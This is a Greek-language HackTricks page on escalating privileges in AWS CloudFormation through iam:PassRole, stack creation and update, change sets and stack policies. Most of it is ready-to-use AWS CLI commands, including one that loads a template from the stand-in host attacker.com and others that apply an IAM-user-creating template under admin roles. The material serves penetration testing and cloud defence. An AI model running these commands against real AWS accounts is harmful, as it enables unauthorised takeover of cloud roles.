Μάθετε το hacking στο AWS από το μηδέν μέχρι τον επαγγελματία με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Για περισσότερες πληροφορίες σχετικά με το cloudformation, ελέγξτε:
{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %} aws-cloudformation-and-codestar-enum.md {% endcontent-ref %}
Ένας επιτιθέμενος με αυτές τις άδειες μπορεί να εξαπλωθεί προνόμια δημιουργώντας ένα CloudFormation stack με ένα προσαρμοσμένο πρότυπο, φιλοξενούμενο στον δικό του διακομιστή, για να εκτελέσει ενέργειες με τις άδειες ενός συγκεκριμένου ρόλου:
aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>
Στην ακόλουθη σελίδα έχετε ένα παράδειγμα εκμετάλλευσης με την επιπλέον άδεια cloudformation:DescribeStacks
:
{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %} iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md {% endcontent-ref %}
Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων στον καθορισμένο ρόλο της υπηρεσίας cloudformation.
Σε αυτήν την περίπτωση μπορείτε να καταχραστείτε ένα υπάρχον cloudformation stack για να το ενημερώσετε και να αναβαθμίσετε τα δικαιώματα όπως στο προηγούμενο σενάριο:
aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1
Η άδεια cloudformation:SetStackPolicy
μπορεί να χρησιμοποιηθεί για να δώσετε στον εαυτό σας την άδεια UpdateStack
σε ένα stack και να πραγματοποιήσετε την επίθεση.
Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων στον ρόλο της υπηρεσίας cloudformation που έχει καθοριστεί.
Αν έχετε αυτήν την άδεια αλλά όχι την iam:PassRole
, μπορείτε ακόμα να ενημερώσετε τα stacks που χρησιμοποιούνται και να καταχραστείτε τους IAM ρόλους που έχουν ήδη συνδεθεί. Ελέγξτε την προηγούμενη ενότητα για παράδειγμα εκμετάλλευσης (απλά μην υποδείξετε κανέναν ρόλο στην ενημέρωση).
Η άδεια cloudformation:SetStackPolicy
μπορεί να χρησιμοποιηθεί για να δώσετε στον εαυτό σας την άδεια UpdateStack
σε ένα stack και να πραγματοποιήσετε την επίθεση.
Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων στον ρόλο της υπηρεσίας cloudformation που έχει ήδη συνδεθεί.
iam:PassRole
,((cloudformation:CreateChangeSet
, cloudformation:ExecuteChangeSet
) | cloudformation:SetStackPolicy
)
Ένας επιτιθέμενος με δικαιώματα να περάσει έναν ρόλο και να δημιουργήσει και εκτελέσει ένα ChangeSet μπορεί να δημιουργήσει/ενημερώσει ένα νέο stack cloudformation και να καταχραστεί τους ρόλους της υπηρεσίας cloudformation όπως και με το CreateStack ή το UpdateStack.
Η παρακάτω εκμετάλλευση είναι μια παραλλαγή της CreateStack χρησιμοποιώντας τα δικαιώματα του ChangeSet για να δημιουργήσει ένα stack.
aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1
echo "Waiting 2 mins to change the stack"
sleep 120
aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1
echo "Waiting 2 mins to execute the stack"
sleep 120
aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1
Η άδεια cloudformation:SetStackPolicy
μπορεί να χρησιμοποιηθεί για να δώσετε στον εαυτό σας δικαιώματα ChangeSet
πάνω σε ένα stack και να πραγματοποιήσετε την επίθεση.
Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων σε ρόλους υπηρεσίας cloudformation.
Αυτή είναι παρόμοια με την προηγούμενη μέθοδο χωρίς την περάτωση ρόλων IAM, οπότε μπορείτε απλά να καταχραστείτε ήδη συνδεδεμένους ρόλους, απλά τροποποιήστε την παράμετρο:
--change-set-type UPDATE
Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων στον ρόλο υπηρεσίας cloudformation που έχει ήδη συνδεθεί.
Ένας επιτιθέμενος μπορεί να καταχραστεί αυτές τις άδειες για να δημιουργήσει/ενημερώσει StackSets για να καταχραστεί αυθαίρετους ρόλους cloudformation.
Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων σε ρόλους υπηρεσίας cloudformation.
Ένας επιτιθέμενος μπορεί να καταχραστεί αυτήν την άδεια χωρίς την άδεια passRole για να ενημερώσει StackSets και να καταχραστεί τους συνδεδεμένους ρόλους cloudformation.
Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων στους συνδεδεμένους ρόλους cloudformation.
Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Συμμετάσχετε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.